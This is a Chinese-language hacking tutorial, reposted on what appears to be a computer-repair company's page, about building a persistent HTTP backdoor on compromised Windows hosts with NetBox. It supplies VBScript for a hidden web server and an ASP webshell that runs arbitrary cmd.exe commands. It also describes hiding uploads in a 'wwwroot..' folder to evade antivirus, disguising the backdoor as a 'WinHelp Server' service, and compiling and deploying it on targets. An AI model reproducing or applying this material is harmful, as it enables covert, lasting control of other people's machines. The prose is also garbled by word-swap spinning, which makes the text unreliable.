轻松拥有自己的超级http后门

  以前写的一篇文章，如今颁布出来，对编程感兴味欢迎和我讨论呵！
  一：媒介
  在当今微软当道的年代，找肉鸡已经不是什么难事，种种百般的傻瓜工具大小气便了菜鸟们的入侵，但是每每入侵乐成了，怎样去做好后门，把肉鸡尽大概久的捉住每每狐疑着像我一样的菜鸟们。用过有数网上经典的后门后，在丢失了n多辛辛苦苦弄到的肉鸡后，我下定刻意要写自己的后门。于是有了下面的文章。
  二：netbox简介
  一个偶然的时机，我了解了netbox。netbox是北京综艺达公司出品的一个利用脚本语言举行应用软件开发与发布的开发环境和运行平台，利用 NetBox，可以完全利用脚本语言(比如 VBScript，Javascript) 创建出稳定高效的应用软件，并且可以腻滑移植到从 Windows 98 到 Windows .NET Server 的全部操纵系统上。
  它可以方便的将asp应用编译成为独立运行的执行程序，完全开脱iis的束缚(将iis卸载后程序运行仍旧正常)，在险些所有的Windows版本下面间接运行，完全不需要考虑平台兼容性和对asp运行环境的要求。同时NetBox还提供大量扩展部件，使得WEB应用越发方便。说了那么多，各人一定很想见识见识这位帅哥吧，好。
  三：一起入手
  要是各人已经对脚本语言VBScript大概Javascript有一点了解，那就可以跟我入手了。我们的使命是在建立一个与iis完全无关的web服务器，它可以为我们提供FSO的支持，以方便上传文件。并支持脚本宿主WSH,这样我们就能执行下令了。在网站根目次里我们可以放上自己的asp木马或别的的木马后门并可以随时执行。
  起首需要建立我们的web服务器，这个服务器和IIS没有任何干系，即使卸载了IIS它也可以运行。利用NetBox的HttpServer工具就能方便的办到。
  在记事本里写入如下几行代码：
  Set httpd = CreateObject("NetBox.HttpServer")
  *创建httpserver工具
  If httpd.Create("", 8000) = 0 Then
  *web服务端口设为8000，可以自己改，不要和其他端口辩论就行了。
  Set host = httpd.AddHost("", "\wwwroot")
  *设置web服务的根目次为文件夹"wwwroot"。
  host.EnableScript = true
  *使Web服务器能够理解服务器端脚本程序，既支持asp。
  host.AddDefault "default.asp"
  host.AddDefault "default.htm"
  host.AddDefault "index.asp"
  host.AddDefault "index.htm"
  host.AddDefault "default.html"
  host.AddDefault "index.html"
  *设置缺省文件，相当与iis中的默许文档。
  httpd.Start
  *开始服务
  else
  httpd.Stop
  Shell.Quit 0
  End If
  End Sub
  将文件存为main.box。
  这样一个支持asp的服务器源代码就写乐成了，它可以让你的asp木马为所欲为的运行，并且不用担忧会有日记记载，但是如今它还远不是一个后门，只是提供了与IIS相当的功效，为了防备后门被杀，我们没干系自己来写一个简单的CMD.ASP，当然不是谁人所谓的最简短的asp后门了。我们要完成的功效是可以上传文件和执行下令。
  这里只阐发重要的代码，详细的代码附在了软件包里。
  set pyeWSH=server.createobject("WSCRIPT.SHELL")
  *建立shell(wshshell)工具pyeWSH
  set pyeFSO=server.createobject("scripting.filesystemobject")
  *建立文件系统工具pyeFSO用于文件方面的操纵
  szTempFile="C:\"& pyeFSO.GetTempName()
  *GetTempName()是fso建立暂时文件的一种方法
  Call pyeWSH.Run ("cmd.exe /c "& szCMD &">" &szTempFile,0,true)
  *调用wshshell的run方法来执行下令，并把效果重定向来暂时文件中
  set oFile=pyeFSO.OpenTextFile(szTempFile,1,False,0)
  *以读的方法翻开暂时文件
  思绪应该很明白，我简单说说。建立shell工具是用于执行下令，建立文件系统工具是用于将下令执行的效果输入到一个暂时文件中并将文件内容读出来。要看到下令执行的效果只要加上这样一句：
  response.write server.HTMLEncode(oFile.ReadAll)
  就能读出暂时文件的内容并显示出来。
  完成上传文件功效的代码也很简单。
  重要代码如下，详细代码可以看我做好的完备的后门。
  细致这里是将上传的文件保存到了肉鸡上的一个“wwwroot.”的文件夹下面，这个文件夹只能在CMD下面用mkdir wwwroot..\ 建立。放在这个文件夹里的文件在一样平常情况下是看不到的，所以可以在一定程度上躲过杀毒软件的查杀，不外执行的时间也要麻烦一点了，因为放在这里面的程序用shell工具的run方法运行不了的，因为根本找不到这个要执行的文件。但稀罕的是可以将里面的文件copy到别的地方，所以需要执行时就是先要将文件copy到别的目次下，当然啦这么简单的事我们的后门完全可以做到。
  asp后门就这样做好了，很简单吧？并且功效也不差，要是你够懒的话，也可以间接用别人的asp后门。
  然后我们将web服务器做成一个真正的服务，也就是可以随系统一起启动，只需要加上这样一句：
  Shell.Service.RunService "WinHelp Server", "WinHelp Server","Windows Help service "
  引号内依次为服务名，服务显示名，服务形貌字符串，可以发扬想象自己改。
  安装服务的下令是：myapp -install，要细致的是这个下令只是将程序变成服务，并没有运行，所以要顿时见效的话，就要输入myapp.exe以执行它。
  卸载服务的下令是：myapp -remove，myapp表现文件的称号。
  四：编译应用程序
  没想到还有这一步吧？像一样平常的编译程序一样，源文件要变异了才能执行，编译需要利用工具nbdw.exe，这个工具用于将NetBox 应用发布成为独立的应用程序，在netbox的官方网站(www.netbox.cn)就有下载的。但是利用前需要注册成为netbox程序员社区成员。界面如图一：
  点击选择源文件夹，找到我们寄存源文件的目次，勾选要编译的文件，在输出文件里填上要生成的执行文件名，如pyedoor.exe，点 Build...，开始编译。
  末了，我们得到了编译乐成的谁人可执行文件，利用时需要上传到远程主机上，执行pyedoor -install，就将后门以服务方法运行了，访问时只需在欣赏器里输入www.target.com:8000/cmd.asp就可以看到我们的木马了。如图二：
  相信熟习网页木马的妙手们不用我罗嗦了吧？但是要细致的是这个网页木马是将上传的文件放在“wwwroot..\”目次下的，即使在command框里输入dir wwwroot..\也看不到上传的文件，也执行不了，目标在于防备被杀。那万一需要执行该怎样办呢？聪明的你一定想到了吧，对了，只要copy“wwroot..\”目次下的文件到别的文件夹下就行了。怎样样很简单吧？原来拥有自己的后门这么容易。
  为了方便各人利用我把做好的后门，做成了自解压文件，里面有必需的源文件，还有一个配合后门的批处置惩罚。利用时只需把这个自解压文件上传到远程主机上执行就可以了。
  五：自我总结
  netbox是一个新工具，本来不是为黑客服务的(这里向北京综艺达软件技术有限公司致敬了)，但我们可以拿来，它还有很多值得开发的功效，很希望和各人一起研讨(netbox的开发手册我已经为各人提供了)。别的就是不要觉得编程之类的很复杂，只要有信心没有办不成的事，哈哈，浮夸了呵。
 

文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明：原创作品，允许转载，转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

评论加载中... 内容： 评论者： 验证码：